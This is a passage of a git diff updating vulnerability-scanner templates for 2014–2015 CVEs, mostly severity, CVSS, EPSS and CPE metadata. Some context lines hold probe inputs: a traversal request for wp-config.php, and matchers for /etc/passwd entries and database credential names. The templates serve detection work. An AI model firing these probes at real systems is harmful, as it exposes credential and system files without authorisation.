4818bef18d..ad862af9f6 100644 --- a/http/cves/2014/CVE-2014-8676.yaml +++ b/http/cves/2014/CVE-2014-8676.yaml @@ -11,14 +11,19 @@ info: - https://www.exploit-db.com/exploits/37604/ - http://seclists.org/fulldisclosure/2015/Jul/44 - https://nvd.nist.gov/vuln/detail/CVE-2014-8676 + - http://packetstormsecurity.com/files/132654/Simple-Online-Planning-Tool-1.3.2-XSS-SQL-Injection-Traversal.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2014-8676 cwe-id: CWE-22 - tags: packetstorm,edb,seclists,cve,cve2014,soplanning,lfi + epss-score: 0.00195 + cpe: cpe:2.3:a:soplanning:soplanning:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: soplanning + product: soplanning + tags: packetstorm,edb,seclists,cve,cve2014,soplanning,lfi http: - method: GET diff --git a/http/cves/2014/CVE-2014-8682.yaml b/http/cves/2014/CVE-2014-8682.yaml index fbe9010a8b..d6b223ccc6 100644 --- a/http/cves/2014/CVE-2014-8682.yaml +++ b/http/cves/2014/CVE-2014-8682.yaml @@ -3,7 +3,7 @@ id: CVE-2014-8682 info: name: Gogs (Go Git Service) - SQL Injection author: dhiyaneshDK,daffainfo - severity: critical + severity: high description: Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go. reference: - https://nvd.nist.gov/vuln/detail/CVE-2014-8682 @@ -13,13 +13,17 @@ info: - https://www.exploit-db.com/exploits/35238 - https://exchange.xforce.ibmcloud.com/vulnerabilities/98694 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2014-8682 cwe-id: CWE-89 + epss-score: 0.00808 + cpe: cpe:2.3:a:gogits:gogs:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: title:"Sign In - Gogs" + vendor: gogits + product: gogs tags: gogs,seclists,packetstorm,edb,cve,cve2014,sqli http: diff --git a/http/cves/2014/CVE-2014-8799.yaml b/http/cves/2014/CVE-2014-8799.yaml index c7297935e2..d4f0792a08 100644 --- a/http/cves/2014/CVE-2014-8799.yaml +++ b/http/cves/2014/CVE-2014-8799.yaml @@ -3,20 +3,27 @@ id: CVE-2014-8799 info: name: WordPress Plugin DukaPress 2.5.2 - Directory Traversal author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php. reference: - https://nvd.nist.gov/vuln/detail/CVE-2014-8799 - https://www.exploit-db.com/exploits/35346 - https://wordpress.org/plugins/dukapress/changelog/ + - https://exchange.xforce.ibmcloud.com/vulnerabilities/98943 + - https://plugins.trac.wordpress.org/changeset/1024640/dukapress classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2014-8799 cwe-id: CWE-22 + epss-score: 0.17844 + cpe: cpe:2.3:a:dukapress:dukapress:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/dukapress" + framework: wordpress + vendor: dukapress + product: dukapress tags: cve,cve2014,wordpress,wp-plugin,lfi,edb http: @@ -27,12 +34,12 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "DB_NAME" - "DB_PASSWORD" - "DB_USER" - "DB_HOST" - part: body condition: and - type: status diff --git a/http/cves/2014/CVE-2014-9094.yaml b/http/cves/2014/CVE-2014-9094.yaml index 7f4a224f7f..d3dc1bd90d 100644 --- a/http/cves/2014/CVE-2014-9094.yaml +++ b/http/cves/2014/CVE-2014-9094.yaml @@ -9,15 +9,19 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2014-9094 - http://websecurity.com.ua/7152/ - http://seclists.org/fulldisclosure/2014/Jul/65 - - http://web.archive.org/web/20210615134835/https://www.securityfocus.com/bid/68525 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2014-9094 cwe-id: CWE-79 - cvss-score: 4.3 + epss-score: 0.83554 + cpe: cpe:2.3:a:digitalzoomstudio:video_gallery:-:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/dzs-videogallery" + framework: wordpress + vendor: digitalzoomstudio + product: video_gallery tags: cve2014,wordpress,xss,wp-plugin,seclists,cve http: diff --git a/http/cves/2014/CVE-2014-9119.yaml b/http/cves/2014/CVE-2014-9119.yaml index 74203611c2..d7b274ff66 100644 --- a/http/cves/2014/CVE-2014-9119.yaml +++ b/http/cves/2014/CVE-2014-9119.yaml @@ -3,7 +3,7 @@ id: CVE-2014-9119 info: name: WordPress DB Backup <=4.5 - Local File Inclusion author: dhiyaneshDK - severity: high + severity: medium description: | WordPress Plugin DB Backup 4.5 and possibly prior versions are prone to a local file inclusion vulnerability because they fail to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks. reference: @@ -11,14 +11,20 @@ info: - https://www.exploit-db.com/exploits/35378 - https://nvd.nist.gov/vuln/detail/CVE-2014-9119 - https://wpvulndb.com/vulnerabilities/7726 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/99368 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2014-9119 cwe-id: CWE-22 - tags: lfi,cve,cve2014,wordpress,wp-plugin,wp,backup,wpscan,edb + epss-score: 0.35426 + cpe: cpe:2.3:a:db_backup_project:db_backup:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: db_backup_project + product: db_backup + tags: lfi,cve,cve2014,wordpress,wp-plugin,wp,backup,wpscan,edb http: - method: GET diff --git a/http/cves/2014/CVE-2014-9444.yaml b/http/cves/2014/CVE-2014-9444.yaml index e633489ab6..430d3ccab7 100644 --- a/http/cves/2014/CVE-2014-9444.yaml +++ b/http/cves/2014/CVE-2014-9444.yaml @@ -9,14 +9,19 @@ info: - https://wpscan.com/vulnerability/f0739b1e-22dc-4ca6-ad83-a0e80228e3c7 - https://nvd.nist.gov/vuln/detail/CVE-2014-9444 - http://packetstormsecurity.com/files/129749/WordPress-Frontend-Uploader-0.9.2-Cross-Site-Scripting.html - - http://web.archive.org/web/20210122092924/https://www.securityfocus.com/bid/71808/ classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2014-9444 - tags: wp-plugin,xss,wpscan,packetstorm,cve,cve2014,wordpress,unauth + cwe-id: CWE-79 + epss-score: 0.00287 + cpe: cpe:2.3:a:frontend_uploader_project:frontend_uploader:0.9.2:*:*:*:*:wordpress:*:* metadata: max-request: 1 - + framework: wordpress + vendor: frontend_uploader_project + product: frontend_uploader + tags: wp-plugin,xss,wpscan,packetstorm,cve,cve2014,wordpress,unauth http: - method: GET @@ -26,9 +31,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '' - part: body - type: word part: header diff --git a/http/cves/2014/CVE-2014-9606.yaml b/http/cves/2014/CVE-2014-9606.yaml index 0026928b20..efe8af9c8a 100644 --- a/http/cves/2014/CVE-2014-9606.yaml +++ b/http/cves/2014/CVE-2014-9606.yaml @@ -14,11 +14,13 @@ info: cvss-score: 6.1 cve-id: CVE-2014-9606 cwe-id: CWE-79 - cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* epss-score: 0.00102 - tags: cve2014,netsweeper,xss,packetstorm,cve + cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: netsweeper + product: netsweeper + tags: cve2014,netsweeper,xss,packetstorm,cve http: - method: GET diff --git a/http/cves/2014/CVE-2014-9607.yaml b/http/cves/2014/CVE-2014-9607.yaml index 3da1089d53..be37a7d4c3 100644 --- a/http/cves/2014/CVE-2014-9607.yaml +++ b/http/cves/2014/CVE-2014-9607.yaml @@ -14,11 +14,13 @@ info: cvss-score: 6.1 cve-id: CVE-2014-9607 cwe-id: CWE-79 - cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* epss-score: 0.00102 - tags: packetstorm,cve,cve2014,netsweeper,xss + cpe: cpe:2.3:a:netsweeper:netsweeper:4.0.3:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: netsweeper + product: netsweeper + tags: packetstorm,cve,cve2014,netsweeper,xss http: - method: GET @@ -28,9 +30,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '' - part: body - type: word part: header diff --git a/http/cves/2014/CVE-2014-9608.yaml b/http/cves/2014/CVE-2014-9608.yaml index 3ea4c114fb..5ef0101702 100644 --- a/http/cves/2014/CVE-2014-9608.yaml +++ b/http/cves/2014/CVE-2014-9608.yaml @@ -14,11 +14,13 @@ info: cvss-score: 6.1 cve-id: CVE-2014-9608 cwe-id: CWE-79 - cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* epss-score: 0.00102 - tags: cve,cve2014,netsweeper,xss,packetstorm + cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: netsweeper + product: netsweeper + tags: cve,cve2014,netsweeper,xss,packetstorm http: - method: GET diff --git a/http/cves/2014/CVE-2014-9609.yaml b/http/cves/2014/CVE-2014-9609.yaml index 14b7abd0e4..7bf486ae6c 100644 --- a/http/cves/2014/CVE-2014-9609.yaml +++ b/http/cves/2014/CVE-2014-9609.yaml @@ -14,11 +14,13 @@ info: cvss-score: 5.3 cve-id: CVE-2014-9609 cwe-id: CWE-22 - cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* epss-score: 0.00149 - tags: cve2014,netsweeper,lfi,packetstorm,cve + cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: netsweeper + product: netsweeper + tags: cve2014,netsweeper,lfi,packetstorm,cve http: - method: GET diff --git a/http/cves/2014/CVE-2014-9614.yaml b/http/cves/2014/CVE-2014-9614.yaml index 543be1df05..dc03faeab2 100644 --- a/http/cves/2014/CVE-2014-9614.yaml +++ b/http/cves/2014/CVE-2014-9614.yaml @@ -14,11 +14,13 @@ info: cvss-score: 9.8 cve-id: CVE-2014-9614 cwe-id: CWE-798 + epss-score: 0.01433 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* - epss-score: 0.01015 - tags: cve,cve2014,netsweeper,default-login,packetstorm metadata: max-request: 1 + vendor: netsweeper + product: netsweeper + tags: cve,cve2014,netsweeper,default-login,packetstorm http: - raw: @@ -32,10 +34,6 @@ http: matchers-condition: and matchers: - - type: status - status: - - 302 - - type: word part: header words: @@ -47,3 +45,7 @@ http: part: header words: - 'Set-Cookie: webadminU=' + + - type: status + status: + - 302 diff --git a/http/cves/2014/CVE-2014-9615.yaml b/http/cves/2014/CVE-2014-9615.yaml index 6363b12a89..5a9e25679e 100644 --- a/http/cves/2014/CVE-2014-9615.yaml +++ b/http/cves/2014/CVE-2014-9615.yaml @@ -14,11 +14,13 @@ info: cvss-score: 6.1 cve-id: CVE-2014-9615 cwe-id: CWE-79 - cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* epss-score: 0.00102 - tags: cve,cve2014,netsweeper,xss,packetstorm + cpe: cpe:2.3:a:netsweeper:netsweeper:4.0.4:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: netsweeper + product: netsweeper + tags: cve,cve2014,netsweeper,xss,packetstorm http: - method: GET diff --git a/http/cves/2014/CVE-2014-9617.yaml b/http/cves/2014/CVE-2014-9617.yaml index 3df4922046..a68c2b43f9 100644 --- a/http/cves/2014/CVE-2014-9617.yaml +++ b/http/cves/2014/CVE-2014-9617.yaml @@ -14,11 +14,13 @@ info: cvss-score: 6.1 cve-id: CVE-2014-9617 cwe-id: CWE-601 - cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* epss-score: 0.00109 - tags: cve,cve2014,netsweeper,redirect,packetstorm + cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: netsweeper + product: netsweeper + tags: cve,cve2014,netsweeper,redirect,packetstorm http: - method: GET diff --git a/http/cves/2014/CVE-2014-9618.yaml b/http/cves/2014/CVE-2014-9618.yaml index 65ab3e2e18..88ebfddbca 100644 --- a/http/cves/2014/CVE-2014-9618.yaml +++ b/http/cves/2014/CVE-2014-9618.yaml @@ -16,9 +16,13 @@ info: cvss-score: 9.8 cve-id: CVE-2014-9618 cwe-id: CWE-287 - tags: cve2014,netsweeper,auth-bypass,packetstorm,edb,cve + epss-score: 0.04784 + cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: netsweeper + product: netsweeper + tags: cve2014,netsweeper,auth-bypass,packetstorm,edb,cve http: - method: GET diff --git a/http/cves/2015/CVE-2015-0554.yaml b/http/cves/2015/CVE-2015-0554.yaml index ced325ad3b..437fa3f2be 100644 --- a/http/cves/2015/CVE-2015-0554.yaml +++ b/http/cves/2015/CVE-2015-0554.yaml @@ -3,7 +3,7 @@ id: CVE-2015-0554 info: name: ADB/Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure author: daffainfo - severity: high + severity: critical description: ADB (formerly Pirelli Broadband Solutions) P.DGA4001N router with firmware PDG_TEF_SP_4.06L.6 does not properly restrict access to the web interface, which allows remote attackers to obtain sensitive information or cause a denial of service (device restart) as demonstrated by a direct request to (1) wlsecurity.html or (2) resetrouter.html. reference: - https://www.exploit-db.com/exploits/35721 @@ -11,13 +11,17 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2015-0554 - http://www.exploit-db.com/exploits/35721 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-200 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:C + cvss-score: 9.4 cve-id: CVE-2015-0554 - tags: pirelli,router,disclosure,edb,packetstorm,cve,cve2015 + cwe-id: CWE-264 + epss-score: 0.0196 + cpe: cpe:2.3:o:adb:p.dga4001n_firmware:pdg_tef_sp_4.06l.6:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: adb + product: p.dga4001n_firmware + tags: pirelli,router,disclosure,edb,packetstorm,cve,cve2015 http: - method: GET diff --git a/http/cves/2015/CVE-2015-1000005.yaml b/http/cves/2015/CVE-2015-1000005.yaml index 0b1b4d2c61..e8edfddced 100644 --- a/http/cves/2015/CVE-2015-1000005.yaml +++ b/http/cves/2015/CVE-2015-1000005.yaml @@ -15,9 +15,14 @@ info: cvss-score: 7.5 cve-id: CVE-2015-1000005 cwe-id: CWE-22 - tags: wpscan,cve,cve2015,wordpress,wp-plugin,lfi,wp + epss-score: 0.03864 + cpe: cpe:2.3:a:candidate-application-form_project:candidate-application-form:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: candidate-application-form_project + product: candidate-application-form + tags: wpscan,cve,cve2015,wordpress,wp-plugin,lfi,wp http: - method: GET diff --git a/http/cves/2015/CVE-2015-1000010.yaml b/http/cves/2015/CVE-2015-1000010.yaml index 7baf16d79f..c7358e9464 100644 --- a/http/cves/2015/CVE-2015-1000010.yaml +++ b/http/cves/2015/CVE-2015-1000010.yaml @@ -15,10 +15,15 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2015-1000010 - cwe-id: CWE-22 - tags: packetstorm,wpscan,cve,cve2015,wordpress,wp-plugin,lfi,wp + cwe-id: CWE-284 + epss-score: 0.02653 + cpe: cpe:2.3:a:simple-image-manipulator_project:simple-image-manipulator:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: simple-image-manipulator_project + product: simple-image-manipulator + tags: packetstorm,wpscan,cve,cve2015,wordpress,wp-plugin,lfi,wp http: - method: GET diff --git a/http/cves/2015/CVE-2015-1000012.yaml b/http/cves/2015/CVE-2015-1000012.yaml index ef712bba32..6e9e63b3af 100644 --- a/http/cves/2015/CVE-2015-1000012.yaml +++ b/http/cves/2015/CVE-2015-1000012.yaml @@ -10,15 +10,19 @@ info: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012 - http://www.vapidlabs.com/advisory.php?v=154 - https://nvd.nist.gov/vuln/detail/CVE-2015-1000012 - - http://web.archive.org/web/20210518144916/https://www.securityfocus.com/bid/94495 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2015-1000012 cwe-id: CWE-200 + epss-score: 0.00773 + cpe: cpe:2.3:a:mypixs_project:mypixs:0.3:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/mypixs" + framework: wordpress + vendor: mypixs_project + product: mypixs tags: cve2015,wordpress,wp-plugin,lfi,wpscan,cve http: @@ -29,9 +33,10 @@ http: matchers-condition: and matchers: - type: regex + part: body regex: - "root:.*:0:0:" - part: body + - type: status status: - 200 diff --git a/http/cves/2015/CVE-2015-1427.yaml b/http/cves/2015/CVE-2015-1427.yaml index 913055efd1..4836458e9d 100644 --- a/http/cves/2015/CVE-2015-1427.yaml +++ b/http/cves/2015/CVE-2015-1427.yaml @@ -3,21 +3,26 @@ id: CVE-2015-1427 info: name: ElasticSearch - Remote Code Execution author: pikpikcu - severity: critical + severity: high description: ElasticSearch before 1.3.8 and 1.4.x before 1.4.3 allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script to the Groovy scripting engine. reference: - https://blog.csdn.net/JiangBuLiu/article/details/94457980 - http://www.elasticsearch.com/blog/elasticsearch-1-4-3-1-3-8-released/ - https://nvd.nist.gov/vuln/detail/CVE-2015-1427 - - http://web.archive.org/web/20210506011817/https://www.securityfocus.com/bid/72585 + - http://packetstormsecurity.com/files/130368/Elasticsearch-1.3.7-1.4.2-Sandbox-Escape-Command-Execution.html + - https://access.redhat.com/errata/RHSA-2017:0868 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2015-1427 - tags: cve,cve2015,elastic,rce,elasticsearch,kev + cwe-id: CWE-284 + epss-score: 0.89427 + cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: elasticsearch + product: elasticsearch + tags: packetstorm,cve,cve2015,elastic,rce,elasticsearch,kev http: - raw: @@ -31,7 +36,6 @@ http: { "name": "test" } - - | POST /_search HTTP/1.1 Host: {{Hostname}} @@ -43,14 +47,14 @@ http: matchers-condition: and matchers: - type: word + part: header words: - "application/json" - part: header - type: regex + part: body regex: - "root:.*:0:0:" - part: body - type: status status: diff --git a/http/cves/2015/CVE-2015-1503.yaml b/http/cves/2015/CVE-2015-1503.yaml index 04f395734f..fcd5595c82 100644 --- a/http/cves/2015/CVE-2015-1503.yaml +++ b/http/cves/2015/CVE-2015-1503.yaml @@ -14,10 +14,14 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2015-1503 - cwe-id: CWE-200 + cwe-id: CWE-22 + epss-score: 0.95625 + cpe: cpe:2.3:a:icewarp:mail_server:*:*:*:*:*:*:*:* metadata: max-request: 2 shodan-query: title:"icewarp" + vendor: icewarp + product: mail_server tags: lfi,mail,packetstorm,cve,cve2015,icewarp http: @@ -28,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" diff --git a/http/cves/2015/CVE-2015-1579.yaml b/http/cves/2015/CVE-2015-1579.yaml index 85b0f488aa..a9e3963ea6 100644 --- a/http/cves/2015/CVE-2015-1579.yaml +++ b/http/cves/2015/CVE-2015-1579.yaml @@ -3,7 +3,7 @@ id: CVE-2015-1579 info: name: WordPress Slider Revolution - Local File Disclosure author: pussycat0x - severity: high + severity: medium description: | Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734. reference: @@ -11,14 +11,20 @@ info: - https://cxsecurity.com/issue/WLB-2021090129 - https://wpscan.com/vulnerability/4b077805-5dc0-4172-970e-cc3d67964f80 - https://nvd.nist.gov/vuln/detail/CVE-2015-1579 + - https://wpvulndb.com/vulnerabilities/7540 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2015-1579 cwe-id: CWE-22 + epss-score: 0.92959 + cpe: cpe:2.3:a:elegant_themes:divi:-:*:*:*:*:wordpress:*:* metadata: max-request: 2 google-query: inurl:/wp-content/plugins/revslider + framework: wordpress + vendor: elegant_themes + product: divi tags: wordpress,wp-plugin,lfi,revslider,wp,wpscan,cve,cve2015 http: @@ -28,6 +34,7 @@ http: - '{{BaseURL}}/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/cves/2015/CVE-2015-1880.yaml b/http/cves/2015/CVE-2015-1880.yaml index 6f7bf973b3..50e22d49d1 100644 --- a/http/cves/2015/CVE-2015-1880.yaml +++ b/http/cves/2015/CVE-2015-1880.yaml @@ -8,16 +8,21 @@ info: reference: - https://www.c2.lol/articles/xss-in-fortigates-ssl-vpn-login-page - http://www.fortiguard.com/advisory/FG-IR-15-005/ - - http://web.archive.org/web/20210122155324/https://www.securityfocus.com/bid/74652/ - https://nvd.nist.gov/vuln/detail/CVE-2015-1880 + - http://www.securitytracker.com/id/1032261 + - http://www.securitytracker.com/id/1032262 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2015-1880 cwe-id: CWE-79 - tags: cve,cve2015,xss,fortigates + epss-score: 0.00201 + cpe: cpe:2.3:o:fortinet:fortios:5.2.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: fortinet + product: fortios + tags: cve,cve2015,xss,fortigates,intrusive http: - method: GET @@ -26,17 +31,16 @@ http: matchers-condition: and matchers: + - type: word + part: body + words: + - - type: word + part: header words: - - "" - part: body + - text/html - type: status status: - 200 - - - type: word - words: - - "text/html" - part: header diff --git a/http/cves/2015/CVE-2015-2067.yaml b/http/cves/2015/CVE-2015-2067.yaml index aa326fb3b5..df78b925c1 100644 --- a/http/cves/2015/CVE-2015-2067.yaml +++ b/http/cves/2015/CVE-2015-2067.yaml @@ -3,7 +3,7 @@ id: CVE-2015-2067 info: name: Magento Server MAGMI - Directory Traversal author: daffainfo - severity: high + severity: medium description: Magento Server MAGMI (aka Magento Mass Importer) contains a directory traversal vulnerability in web/ajax_pluginconf.php. that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. reference: - https://www.exploit-db.com/exploits/35996 @@ -14,9 +14,14 @@ info: cvss-score: 5 cve-id: CVE-2015-2067 cwe-id: CWE-22 + epss-score: 0.01338 + cpe: cpe:2.3:a:magmi_project:magmi:-:*:*:*:*:magento_server:*:* metadata: max-request: 1 shodan-query: http.component:"Magento" + framework: magento_server + vendor: magmi_project + product: magmi tags: plugin,edb,packetstorm,cve,cve2015,lfi,magento,magmi http: @@ -26,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2015/CVE-2015-2068.yaml b/http/cves/2015/CVE-2015-2068.yaml index 0691e57f57..67480a5b4d 100644 --- a/http/cves/2015/CVE-2015-2068.yaml +++ b/http/cves/2015/CVE-2015-2068.yaml @@ -14,10 +14,15 @@ info: cvss-score: 4.3 cve-id: CVE-2015-2068 cwe-id: CWE-79 + epss-score: 0.00146 + cpe: cpe:2.3:a:magmi_project:magmi:-:*:*:*:*:magento_server:*:* metadata: max-request: 1 shodan-query: http.component:"Magento" verified: true + framework: magento_server + vendor: magmi_project + product: magmi tags: plugin,edb,packetstorm,cve,cve2015,magento,magmi,xss http: diff --git a/http/cves/2015/CVE-2015-2080.yaml b/http/cves/2015/CVE-2015-2080.yaml index 3f3c4de28c..e4f753a49f 100644 --- a/http/cves/2015/CVE-2015-2080.yaml +++ b/http/cves/2015/CVE-2015-2080.yaml @@ -10,28 +10,35 @@ info: - https://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html - http://packetstormsecurity.com/files/130567/Jetty-9.2.8-Shared-Buffer-Leakage.html - https://nvd.nist.gov/vuln/detail/CVE-2015-2080 + - http://dev.eclipse.org/mhonarc/lists/jetty-announce/msg00074.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2015-2080 cwe-id: CWE-200 - tags: cve,cve2015,jetty,packetstorm + epss-score: 0.95465 + cpe: cpe:2.3:o:fedoraproject:fedora:22:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: fedoraproject + product: fedora + tags: cve,cve2015,jetty,packetstorm http: - method: POST path: - "{{BaseURL}}" + headers: Referer: \x00 matchers-condition: and matchers: + - type: word + part: body + words: + - "Illegal character 0x0 in state" + - type: status status: - 400 - - type: word - words: - - "Illegal character 0x0 in state" - part: body diff --git a/http/cves/2015/CVE-2015-2166.yaml b/http/cves/2015/CVE-2015-2166.yaml index babe465959..ef0c99aad9 100644 --- a/http/cves/2015/CVE-2015-2166.yaml +++ b/http/cves/2015/CVE-2015-2166.yaml @@ -3,21 +3,25 @@ id: CVE-2015-2166 info: name: Ericsson Drutt MSDP - Local File Inclusion author: daffainfo - severity: high + severity: medium description: Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI in the Instance Monitor. reference: - https://www.exploit-db.com/exploits/36619 - https://nvd.nist.gov/vuln/detail/CVE-2015-2166 - http://packetstormsecurity.com/files/131233/Ericsson-Drutt-MSDP-Instance-Monitor-Directory-Traversal-File-Access.html - - http://web.archive.org/web/20210122142229/https://www.securityfocus.com/bid/73901/ + - https://www.exploit-db.com/exploits/36619/ classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2015-2166 cwe-id: CWE-22 - tags: cve,cve2015,lfi,ericsson,edb,packetstorm + epss-score: 0.16846 + cpe: cpe:2.3:a:ericsson:drutt_mobile_service_delivery_platform:4.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: ericsson + product: drutt_mobile_service_delivery_platform + tags: cve,cve2015,lfi,ericsson,edb,packetstorm http: - method: GET diff --git a/http/cves/2015/CVE-2015-2196.yaml b/http/cves/2015/CVE-2015-2196.yaml index b34dfad448..b5536d0979 100644 --- a/http/cves/2015/CVE-2015-2196.yaml +++ b/http/cves/2015/CVE-2015-2196.yaml @@ -3,7 +3,7 @@ id: CVE-2015-2196 info: name: WordPress Spider Calendar <=1.4.9 - SQL Injection author: theamanrawat - severity: critical + severity: high description: | WordPress Spider Calendar plugin through 1.4.9 is susceptible to SQL injection. An attacker can execute arbitrary SQL commands via the cat_id parameter in a spiderbigcalendar_month action to wp-admin/admin-ajax.php, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations. reference: @@ -13,13 +13,18 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2015-2196 remediation: Fixed in version 1.4.14. classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2015-2196 cwe-id: CWE-89 + epss-score: 0.0093 + cpe: cpe:2.3:a:web-dorado:spider_calendar:1.4.9:*:*:*:*:wordpress:*:* metadata: max-request: 1 verified: true + framework: wordpress + vendor: web-dorado + product: spider_calendar tags: wordpress,wp,sqli,cve2015,wpscan,wp-plugin,spider-event-calendar,unauth,edb,cve http: diff --git a/http/cves/2015/CVE-2015-2755.yaml b/http/cves/2015/CVE-2015-2755.yaml index 0b3cabc99d..23c9e7585f 100644 --- a/http/cves/2015/CVE-2015-2755.yaml +++ b/http/cves/2015/CVE-2015-2755.yaml @@ -11,14 +11,20 @@ info: - http://packetstormsecurity.com/files/131155/WordPress-Google-Map-Travel-3.4-XSS-CSRF.html - 